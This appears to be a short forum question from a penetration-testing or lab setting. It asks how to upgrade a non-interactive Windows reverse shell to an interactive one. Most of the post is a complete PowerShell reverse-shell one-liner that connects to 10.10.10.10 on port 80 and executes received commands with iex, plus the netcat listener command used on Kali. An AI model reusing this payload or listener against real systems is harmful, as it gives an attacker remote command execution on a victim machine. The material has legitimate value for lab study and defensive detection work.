I have a web shell that I managed to convert to a reverse shell by running:
On Windows: $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
On Kali: sudo rlwrap nc -nvlp 80
However, this is a non-interactive shell. Running sc query or sc qc hangs the shell (luckily systeminfo and whoami /priv work).
What methods of upgrading a "dumb" shell to an interactive shell exist on Windows?